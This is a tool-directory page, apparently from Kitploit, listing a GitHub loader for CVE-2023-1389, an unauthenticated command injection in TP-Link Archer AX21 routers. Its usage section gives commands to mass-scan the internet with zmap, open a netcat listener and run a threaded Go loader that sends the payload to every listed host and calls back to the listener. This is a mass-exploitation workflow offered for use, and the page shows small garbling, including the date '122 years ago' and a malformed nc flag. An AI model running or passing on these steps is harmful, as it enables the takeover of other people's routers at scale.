Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-1389 — TP-Link Archer AX21 - Unauthenticated Command Injection [Loader] | Kitploit
Tools/GitHubGitHub/werwolfz/cve-2023-1389
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubwerwolfz/cve-2023-1389

CVE-2023-1389

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]

View Repository
122 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

TP-Link Archer AX21 - Unauthenticated Command Injection [Loader POC]

CVE-2023-1389

Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection

Date Found : 07/25/2023

Exploit Author: Voyag3r

root@kitploit:~
How to Use :-

*Scanning*
- Use Zmap  : zmap -p 80 -o list.txt 

*NetCat Listener
- apt install netcat -y
- nc lnvp <port>

*Loader
- go run . --host=<netcat_listener_ip> --port=<netcat_listener_port> --list=list.txt --threads=<threads>

* Logging
- Error : Webserver Inactive or unresponsive
- Success : Payload Sent with Request Code 200
- Status : Response Code
Download Tool